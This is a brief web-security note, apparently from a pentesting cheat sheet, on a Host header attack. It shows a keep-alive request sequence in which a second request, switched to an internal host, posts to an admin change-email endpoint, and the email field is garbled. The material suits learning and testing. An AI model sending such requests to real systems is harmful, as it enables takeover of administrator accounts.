Host Header Attack
Last modified: 2023-06-11
If the web server validates only the first request, we may be able to exploit the second request by keeping the connection and changing the Host header to the internal page.
GET / HTTP/2 Host: example.com ... Connection: keep-alive
POST /admin/change-email HTTP/2 Host: 192.168.0.1 firstname.lastname@example.orgemail@example.comfirstname.lastname@example.org
As a result, we may be able to change the admin's email to arbitrary email.